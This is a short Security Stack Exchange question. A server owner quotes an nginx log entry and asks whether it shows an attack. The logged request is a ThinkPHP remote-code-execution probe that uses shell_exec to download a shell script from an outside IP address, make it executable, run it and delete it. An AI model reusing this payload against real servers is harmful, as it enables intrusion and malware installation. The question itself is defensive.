Suspicious log entries

Asked Oct 09 '22 at 09:22

Active Oct 09 '22 at 09:44

Viewed 17 times

I have this kind of entries in my nginx log. If I read them correctly, someone is trying to call index.php script that is trying to download some shell script, but I don't have any PHP on this server (at least not that I know of), and it seems the response code is 400.

112.239.175.156 - - [09/Oct/2022:04:05:30 +0000] "GET /index.php?s=/index/\x09hink\x07pp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://135.148.104.21/w.sh -O w ; chmod 777 w ; ./w ; rm -rf w' HTTP/1.1" 400 150 "-" "-" "-"

edited Oct 09 '22 at 09:44

schroeder

125,553
55
289
326

asked Oct 09 '22 at 09:22

steakoverflow

Does this answer your question? [Strange requests to web server](https://security.stackexchange.com/questions/40291/strange-requests-to-web-server), [Appropriate defense for 404s in my logs - persistent web scans from one region](https://security.stackexchange.com/questions/5301/appropriate-defense-for-404s-in-my-logs-persistent-web-scans-from-one-region). – Steffen Ullrich Oct 09 '22 at 09:29

Suspicious log entries

0 Answers0